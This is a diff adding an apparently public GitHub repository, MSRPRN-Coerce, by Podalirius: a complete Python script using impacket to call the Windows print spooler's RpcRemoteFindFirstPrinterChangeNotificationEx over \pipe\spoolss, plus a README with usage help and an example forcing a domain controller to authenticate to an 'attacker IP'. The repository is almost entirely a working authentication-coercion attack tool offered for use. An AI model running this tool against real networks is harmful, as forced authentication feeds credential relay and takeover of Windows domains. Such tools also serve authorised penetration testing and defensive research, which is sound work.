p0dalirius
diff --git a/‎.github/FUNDING.yml
+4 b/‎.github/FUNDING.yml
+4
diff --git a/‎.github/banner.png
87.2 KB b/‎.github/banner.png
87.2 KB
diff --git a/‎.github/demo.mp4
1.05 MB b/‎.github/demo.mp4
1.05 MB
diff --git a/‎.github/example.png
217 KB b/‎.github/example.png
217 KB
diff --git a/‎MS-RPRN-Coerce.py
+276 b/‎MS-RPRN-Coerce.py
+276
diff --git a/‎README.md
+79 b/‎README.md
+79
diff --git a/‎requirements.txt
+1 b/‎requirements.txt
+1
@@ -0,0 +1,4 @@
+# These are supported funding model platforms
+
+github: p0dalirius
+patreon: Podalirius
@@ -0,0 +1,276 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# File name          : MS-RPRN-Coerce.py
+# Author             : Podalirius (@podalirius_)
+# Date created       : 24 Feb 2022
+
+
+import argparse
+import binascii
+import sys
+from impacket.structure import Structure
+from impacket.dcerpc.v5 import transport
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+from impacket.uuid import uuidtup_to_bin
+
+
+# printer and listener struct
+class type1(Structure):
+    alignment = 4
+    structure = (
+        ('id', '<L'),  # printer name referent ID
+        ('max', '<L'),
+        ('offset', '<L=0'),
+        ('actual', '<L'),
+        ('str', '%s'),
+    )
+
+
+# client and user struct
+class type2(Structure):
+    alignment = 4
+    structure = (
+        ('max', '<L'),
+        ('offset', '<L=0'),
+        ('actual', '<L'),
+        ('str', '%s'),
+    )
+
+
+# create RpcOpenPrinterEx struct
+class OpenPrinterEx(Structure):
+    alignment = 4
+    opnum = 69
+    structure = (
+        ('printer', ':', type1),
+        ('null', '<L=0'),
+        ('str', '<L=0'),
+        ('null2', '<L=0'),
+        ('access', '<L=0x00020002'),
+        ('level', '<L=1'),
+        ('id1', '<L=1'),
+        ('level2', '<L=131076'),  # user level 1 infolevel
+        ('size', '<L=28'),
+        ('id2', '<L=0x00020008'),  # client referent id
+        ('id3', '<L=0x0002000c'),  # user referent id
+        ('build', '<L=8000'),
+        ('major', '<L=0'),
+        ('minor', '<L=0'),
+        ('processor', '<L=0'),
+        ('client', ':', type2),
+        ('user', ':', type2),
+    )
+
+
+# partialy create RemoteFindFirstPrinterChangeNotificationEx struct
+class RemoteFindFirstPrinterChangeNotificationEx(Structure):
+    alignment = 4
+    opnum = 65
+    structure = (
+        ('flags', '<L=0'),
+        ('options', '<L=0'),
+        ('server', ':', type1),
+        ('local', '<L=123'),  # Printer local
+    )
+
+
+##===========================================================================================================
+
+
+def connect(username, password, domain, lmhash, nthash, target, doKerberos, dcHost, targetIp, verbose=False):
+    MSRPC_UUID_SPOOLSS = ('12345678-1234-ABCD-EF00-0123456789AB', '1.0')
+    stringBinding = r'ncacn_np:%s[\pipe\spoolss]' % target
+
+    rpctransport = transport.DCERPCTransportFactory(stringBinding)
+    if hasattr(rpctransport, 'set_credentials'):
+        rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
+
+    if doKerberos:
+        rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
+    if targetIp:
+        rpctransport.setRemoteHost(targetIp)
+
+    dce = rpctransport.get_dce_rpc()
+    dce.set_auth_type(RPC_C_AUTHN_WINNT)
+    dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+    print("[>] Connecting to %s ..." % stringBinding)
+    try:
+        dce.connect()
+    except Exception as e:
+        if verbose:
+            raise
+        else:
+            print("[!] %s" % str(e))
+        return None
+    print("[+] Connected!")
+    print("[+] Binding to %s" % MSRPC_UUID_SPOOLSS[0])
+    try:
+        dce.bind(uuidtup_to_bin(MSRPC_UUID_SPOOLSS))
+    except Exception as e:
+        if verbose:
+            raise
+        else:
+            print("[!] %s" % str(e))
+        return None
+    print("[+] Successfully bound!")
+    return dce
+
+
+def build_RpcOpenPrinterEx_struct(username, client, target):
+    query = OpenPrinterEx()
+    printer = "\\\\%s\x00" % target  # blank printer
+    #
+    query['printer'] = type1()
+    query['printer']['id'] = 0x00020000  # referent ID for printer
+    query['printer']['max'] = len(printer)  # printer max size
+    query['printer']['actual'] = len(printer)  # printer actual size
+    query['printer']['str'] = printer.encode('utf_16_le')
+    #
+    query['client'] = type2()
+    query['client']['max'] = len(client)
+    query['client']['actual'] = len(client)
+    query['client']['str'] = client.encode('utf_16_le')
+    #
+    query['user'] = type2()
+    query['user']['max'] = len(username)
+    query['user']['actual'] = len(username)
+    query['user']['str'] = username.encode('utf_16_le')
+    return query
+
+
+# partially build RpcRemoteFindFirstPrinterChangeNotificationEx() struct
+def build_RpcRemoteFindFirstPrinterChangeNotificationEx_struct(listener):
+    query = RemoteFindFirstPrinterChangeNotificationEx()
+    server = '\\\\%s\x00' % listener  # server
+    query['server'] = type1()
+    query['server']['id'] = 0x41414141  # referent ID for server
+    query['server']['max'] = len(server)  # server name max size
+    query['server']['actual'] = len(server)  # server name actual size
+    query['server']['str'] = server.encode('utf_16_le')
+    return query
+
+
+def parseArgs():
+    print("MS-RPRN-Coerce v1.1 - by @podalirius_\n")
+
+    parser = argparse.ArgumentParser(description="Force authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 69).")
+    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
+
+    authconn = parser.add_argument_group('authentication & connection')
+    authconn.add_argument('--dc-ip', required=False, default=None, action='store', metavar="ip address", help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter')
+    authconn.add_argument("-d", "--domain", required=False, default='', dest="auth_domain", metavar="DOMAIN", action="store", help="(FQDN) domain to authenticate to")
+    authconn.add_argument("-u", "--user", required=False, default='', dest="auth_username", metavar="USER", action="store", help="user to authenticate with")
+    authconn.add_argument('--target-ip', dest="target_ip", action='store', metavar="ip address", help='IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
+
+    secret = parser.add_argument_group()
+    cred = secret.add_mutually_exclusive_group()
+    cred.add_argument("--no-pass", action="store_true", help="Don't ask for password (useful for -k)")
+    cred.add_argument("-p", "--password", dest="auth_password", metavar="PASSWORD", action="store", help="Password to authenticate with")
+    cred.add_argument("-H", "--hashes", dest="auth_hashes", action="store", metavar="[LMHASH:]NTHASH", help='NT/LM hashes, format is LMhash:NThash')
+    cred.add_argument("--aes-key", dest="auth_key", action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+    secret.add_argument("-k", "--kerberos", dest="use_kerberos", action="store_true", help='Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
+
+    parser.add_argument("listener", help='IP address or hostname of listener.')
+    parser.add_argument("target", help='IP address or hostname of target.')
+
+    if len(sys.argv) == 1:
+        parser.print_help()
+        sys.exit(1)
+
+    return parser.parse_args()
+
+
+def patch_impacket_structure_py3(struct):
+    if sys.version_info.major == 3:
+        # Live patch because impacket's structure.py is hell in Python3
+        for fn, fv in vars(struct)['fields'].items():
+            struct.fields[fn]['str'] = struct.fields[fn]['str'].decode('utf-8')
+        return struct
+    else:
+        # Python 2 compatibility
+        return struct
+
+
+if __name__ == '__main__':
+    options = parseArgs()
+
+    auth_lm_hash = ""
+    auth_nt_hash = ""
+    if options.auth_hashes is not None:
+        if ":" in options.auth_hashes:
+            auth_lm_hash = options.auth_hashes.split(":")[0]
+            auth_nt_hash = options.auth_hashes.split(":")[1]
+        else:
+            auth_nt_hash = options.auth_hashes
+
+    dce_conn = connect(
+        options.auth_username,
+        options.auth_password,
+        options.auth_domain,
+        auth_lm_hash,
+        auth_nt_hash,
+        options.target,
+        options.use_kerberos,
+        options.dc_ip,
+        options.target_ip,
+        verbose=options.verbose
+    )
+
+    if dce_conn is not None:
+        print("[*] Getting context handle ...")
+        context_handle = build_RpcOpenPrinterEx_struct(
+            username=options.auth_domain + "\\" + options.auth_username + "\x00",
+            client=options.listener + "\x00",
+            target=options.target + "\x00"
+        )
+        handle = None
+        try:
+            context_handle = patch_impacket_structure_py3(context_handle)
+            if options.verbose:
+                print("[debug] DCERPC call opnum=%d, handle=%s" % (context_handle.opnum, binascii.hexlify(context_handle.getData()).decode('utf-8')))
+            dce_conn.call(context_handle.opnum, context_handle)
+
+            raw = dce_conn.recv()
+            if options.verbose:
+                print("[debug] Raw response: %s" % binascii.hexlify(raw).decode('utf-8'))
+            handle = raw[:20]
+            if options.verbose:
+                print("[debug] Handle is: %s" % binascii.hexlify(handle).decode('utf-8'))
+        except Exception as e:
+            if options.verbose:
+                raise
+            else:
+                print("[!] %s" % str(e))
+            dce_conn.disconnect()
+            sys.exit()
+        if handle is not None:
+            print("[*] Calling RpcRemoteFindFirstPrinterChangeNotificationEx ...")
+            options_container = (
+                b'\x04\x00\x02\x00'  # referent id
+                b'\x02\x00\x00\x00'  # version
+                b'\xce\x55\x00\x00'  # flags
+                b'\x02\x00\x00\x00'  # count
+                # notify options blob to unpack another day
+                b'\x08\x00\x02\x00\x02\x00\x00\x00\x00\x00\xce\x55\x00\x00'
+                b'\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0c\x00\x02\x00'
+                b'\x01\x00\x00\x00\xe0\x11\xbd\x8f\xce\x55\x00\x00\x01\x00'
+                b'\x00\x00\x10\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00'
+                b'\x01\x00\x00\x00\x00\x00'
+            )
+            # call function to get method core
+            query = build_RpcRemoteFindFirstPrinterChangeNotificationEx_struct(options.listener)
+            query = patch_impacket_structure_py3(query)
+            full_query = handle + query.getData() + options_container
+            try:
+                dce_conn.call(query.opnum, full_query)
+                raw = dce_conn.recv()
+                if options.verbose:
+                    print("[debug] Raw response: %s" % binascii.hexlify(raw).decode('utf-8'))
+            except Exception as e:
+                if options.verbose:
+                    raise
+                else:
+                    print("[!] %s" % str(e))
+                dce_conn.disconnect()
+            print("[+] Done!")
+        dce_conn.disconnect()
@@ -0,0 +1,79 @@
+# MSRPRN-Coerce
+
+<p align="center">
+    A python script to force authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 69).
+    <br>
+    <img src="https://visitor-badge.glitch.me/badge?page_id=https://github.com/p0dalirius/MSRPRN-Coerce/README.md"/>
+    <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/p0dalirius/MSRPRN-Coerce">
+    <a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"><img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&style=social"></a>
+    <br>
+</p>
+
+![](./.github/banner.png)
+
+## Features
+
+**Requires**: A valid username and password on the domain.
+
+ - [x] Force authentification using MS-RPRN `RemoteFindFirstPrinterChangeNotificationEx` function (opnum 69).
+ - [x] 🐍 Python 3 and Python 2 compatibility.
+ - [x] Targets either a single IP or a range of IPs.
+
+## Usage
+
+```
+$ ./MS-RPRN-Coerce.py -h
+MS-RPRN-Coerce v1.1 - by @podalirius_
+
+usage: e.py [-h] [-v] [--dc-ip ip address] [-d DOMAIN] [-u USER] [--target-ip ip address] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]
+            listener target
+
+Force authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 69).
+
+positional arguments:
+  listener              IP address or hostname of listener.
+  target                IP address or hostname of target.
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -v, --verbose         Verbose mode. (default: False)
+
+authentication & connection:
+  --dc-ip ip address    IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the
+                        identity parameter
+  -d DOMAIN, --domain DOMAIN
+                        (FQDN) domain to authenticate to
+  -u USER, --user USER  user to authenticate with
+  --target-ip ip address
+                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or
+                        Kerberos name and you cannot resolve it
+
+  --no-pass             Don't ask for password (useful for -k)
+  -p PASSWORD, --password PASSWORD
+                        Password to authenticate with
+  -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
+                        NT/LM hashes, format is LMhash:NThash
+  --aes-key hex key     AES key to use for Kerberos Authentication (128 or 256 bits)
+  -k, --kerberos        Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it
+                        will use the ones specified in the command line
+```
+
+## Example
+
+To force `DC01.LAB.local` to authenticate over SMB to your attacker IP `192.168.2.51`:
+
+```
+./MS-RPRN-Coerce.py 192.168.2.51 DC01.LAB.local -u user1 -p 'Lab123!'
+```
+
+## Technical detail
+
+This attack performs an RPC call of the `RpcRemoteFindFirstPrinterChangeNotificationEx` function (opnum 69) in the SMB named pipe `\pipe\spoolss` through the `IPC$` share to force authentication from a target machine to another.
+
+## Demo
+
+
+
+## Contributing
+
+Pull requests are welcome. Feel free to open an issue if you want to add other features.
@@ -0,0 +1 @@
+impacket